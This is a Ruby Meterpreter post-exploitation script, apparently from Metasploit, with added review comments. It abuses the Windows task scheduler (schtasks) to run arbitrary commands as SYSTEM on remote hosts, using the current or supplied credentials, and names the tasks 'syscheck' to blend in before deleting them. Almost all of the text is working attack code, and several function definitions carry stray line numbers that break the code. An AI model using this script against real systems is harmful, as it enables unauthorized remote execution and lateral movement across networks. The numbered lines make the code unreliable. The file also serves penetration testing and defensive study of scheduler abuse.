

##
# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
# If you'd like to improve this script, please try to port it as a post
# module instead. Thank you.
##
# Meterpreter script for abusing the scheduler service in Windows
# by scheduling and running a list of commands against one or more targets
# using the schtasks command to run them as SYSTEM. This script works with Windows XP,
# Windows 2003, Windows Vista and Windows 2008.
# Version: 0.1.1
# Note: on Vista, UAC must be disabled to be able to perform scheduling,
# and the meterpreter must be running under the profile of a local admin
# or SYSTEM.
################## Variable Declarations ##################
session = client

# Option table for this script. @@exec_opts is also read by `usage` below,
# so its name is part of the script's internal interface.
# NOTE(review): a class variable at script top level — presumably the script
# is evaluated inside a class context by the Meterpreter script loader;
# confirm, since plain Ruby 3 rejects class-variable access from toplevel.
@@exec_opts = Rex::Parser::Arguments.new(
  '-h' => [false, 'Help menu.'],
  '-c' => [true, 'Commands to execute. Several commands can be given but separated by commas and enclose the list in double quotes if arguments are used.'],
  '-u' => [true, 'Username to schedule task, if none is given the current user credentials will be used.'],
  '-p' => [true, 'Password for user account specified, it must be given if a user is given.'],
  '-d' => [true, 'Delay between the execution of commands in seconds, default is 2 seconds if not given.'],
  '-t' => [true, 'Remote system to schedule job.'],
  '-l' => [true, 'Text file with list of targets, one per line.'],
  '-s' => [true, 'Text file with list of commands, one per line.']
)

# Defaults for the argument-derived state; the option parser below fills these in.
commands = []
targets = []
username = password = nil
delay = 2          # seconds between running a command and removing its task
help = 0           # set to 1 by -h; non-zero routes to `usage` instead of `abuse`
  34. def usage
  35. print_status( "This Meterpreter script is for running commands on targets system using the")
  36. print_status( "Windows Scheduler, it is based on the tool presented but not released by Val Smith")
  37. print_status( "in Defcon 16 ATAbuser. If no user and password is given it will use the permissions")
  38. print_status( "of the process Meterpreter is running under.")
  39. print_status( "Options:")
  40. print_status( @@exec_opts.usage )
  41. end
# Schedule and run every entry of `commands` on every host in `targets` via
# the Windows task scheduler (`schtasks`), driven through cmd.exe on the
# Meterpreter session.
#
# session  - Meterpreter client; only session.sys.process.execute is used
# targets  - Array of host strings; blank entries and entries starting with "#" are skipped
# commands - Array of command strings; blank entries and entries starting with "#" are skipped
# username - account passed to schtasks as /u, or nil
# password - password passed to schtasks as /p, or nil
# delay    - seconds slept between running a command and deleting its task
#
# Raises RuntimeError ("Command could not be Scheduled") when the output of
# the create step never contains "successfully been created".
#
# NOTE(review): the two branches of the credential check are identical except
# for the `/u`/`/p` arguments; any fix to one must be mirrored in the other.
def abuse(session,targets,commands,username,password,delay)
  #for each target
  targets.each do |t|
    next if t.strip.length < 1
    next if t[0,1] == "#"
    #for each command
    commands.each do |c|
      next if c.strip.length < 1
      next if c[0,1] == "#"
      # Task name is "syscheck" plus a number in 0..99, so names can repeat
      # across commands on the same host.
      taskname = "syscheck#{rand(100)}"
      success = false
      #check if user name and password were given, if not credentials of running process used
      # (only the case where BOTH are nil takes this branch; a username without a
      # password falls through to the /u /p form with an empty /p value)
      if username == nil && password == nil
        print_status("Scheduling command #{c} to run .....")
        # NOTE(review): c and t are interpolated into the cmd.exe line without
        # any quoting/escaping beyond the literal quotes around the task name and command.
        execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t} /st 00:00:00"
        # NOTE(review): 'Hidden' is the string 'true' while 'Channelized' is a
        # boolean; confirm the string form is honoured by process.execute.
        r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true})
        #check if successfully scheduled: read the channel until EOF, looking for the schtasks success text
        while(d = r.channel.read)
          if d =~ /successfully been created/
            print_status("The scheduled task has been successfully created")
            success = true
          end
        end
        #check if schedule successful, if not raise error
        if !success
          print_status("Failed to create scheduled task!!")
          # NOTE(review): raising here skips r.channel.close / r.close below,
          # so the channel is left open on the failure path.
          raise "Command could not be Scheduled"
        elsif success
          # `success` is a boolean, so this is effectively the else arm.
          print_status("Running command on #{t}")
          session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t}")
        end
        r.channel.close
        r.close
        #Wait before scheduling next command
        sleep(delay)
        print_status("Removing scheduled task")
        session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t} /F")
      else
        print_status("Scheduling command #{c} to run .....")
        # NOTE(review): the password is placed in clear text on the cmd.exe
        # command line here and in the /run and /delete calls below.
        execmd = "schtasks /create /tn \"#{taskname}\" /tr \"#{c}\" /sc once /ru system /s #{t} /u #{username} /p #{password} /st 00:00:00"
        r = session.sys.process.execute("cmd.exe /c #{execmd}", nil, {'Hidden' => 'true','Channelized' => true})
        #check if successfully scheduled: read the channel until EOF, looking for the schtasks success text
        while(d = r.channel.read)
          if d =~ /successfully been created/
            print_status("The scheduled task has been successfully created")
            success = true
          end
        end
        #check if schedule successful, if not raise error
        if !success
          print_status("Failed to create scheduled task!!")
          # NOTE(review): same leak as above — the channel is not closed before raising.
          raise "Command could not be Scheduled"
        elsif success
          print_status("Running command on #{t}")
          session.sys.process.execute("cmd.exe /c schtasks /run /tn #{taskname} /s #{t} /u #{username} /p #{password}")
        end
        r.channel.close
        r.close
        #Wait before scheduling next command
        sleep(delay)
        print_status("Removing scheduled task")
        session.sys.process.execute("cmd.exe /c schtasks /delete /tn #{taskname} /s #{t} /u #{username} /p #{password} /F")
      end
    end
  end
end
# Abort handler for an unsupported Meterpreter platform
  109. def unsupported
  110. print_error("This version of Meterpreter is not supported with this Script!")
  111. raise Rex::Script::Completed
  112. end
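# Parse the script arguments into the state declared above.
#
# -c and -t REPLACE whatever was collected so far, while -s and -l APPEND
# line by line; order on the command line therefore matters.
# -s/-l now read with File.foreach so the handle is closed after reading
# (the previous File.open(...).each_line form never closed it), and -l reports
# a missing target list rather than a missing command list.
@@exec_opts.parse(args) do |opt, _idx, val|
  case opt
  when "-c"
    commands = val.split(',')
  when "-u"
    username = val
  when "-p"
    password = val
  when "-t"
    targets = val.split(',')
  when "-d"
    # String#to_i: non-numeric input silently becomes 0 (no delay).
    delay = val.to_i
  when "-s"
    raise "Command List File does not exists!" unless ::File.exist?(val)
    ::File.foreach(val) { |line| commands << line.chomp }
  when "-l"
    raise "Target List File does not exist!" unless ::File.exist?(val)
    ::File.foreach(val) { |line| targets << line.chomp }
  when "-h"
    help = 1
  end
end

# Platform check happens after parsing, so file errors above surface first.
unsupported if client.platform != 'windows'
print_status("Meterpreter session running as #{session.sys.config.getuid}")

# An empty target list is not rejected here; `abuse` simply iterates nothing.
if help == 0 && commands.length != 0
  abuse(session,targets,commands,username,password,delay)
else
  usage
end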